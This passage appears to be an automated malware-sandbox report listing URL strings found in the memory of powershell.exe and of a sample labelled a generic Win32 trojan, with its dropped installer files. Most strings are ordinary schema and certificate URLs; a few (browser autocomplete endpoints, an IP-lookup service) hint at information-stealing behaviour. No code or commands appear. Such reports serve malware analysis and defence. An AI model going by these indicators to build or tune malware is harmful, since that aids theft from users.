Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr | String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000005.00000002.541635765.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.497379315.0000000007DC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c/g
Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr | String found in binary or memory: http://ocsps.ssl.com0
Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/EInvalidGlobalDataContractNamespace?DataContractNamespaceAlr
Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq?IsValueTypeFormattedIncorrectly1BaseTypeNotI
Source: powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyP=
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://t2.symcb.com0
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://tempuri.org/
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1Response
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1ResponseD
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2Response
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2ResponseD
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.556972704.000000000DD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3Response
                  Source: powershell.exe, 00000005.00000002.556972704.000000000DD11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3ResponseD
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/V
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: http://tl.symcd.com0&
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000005.00000002.556972704.000000000DD11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecLR
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 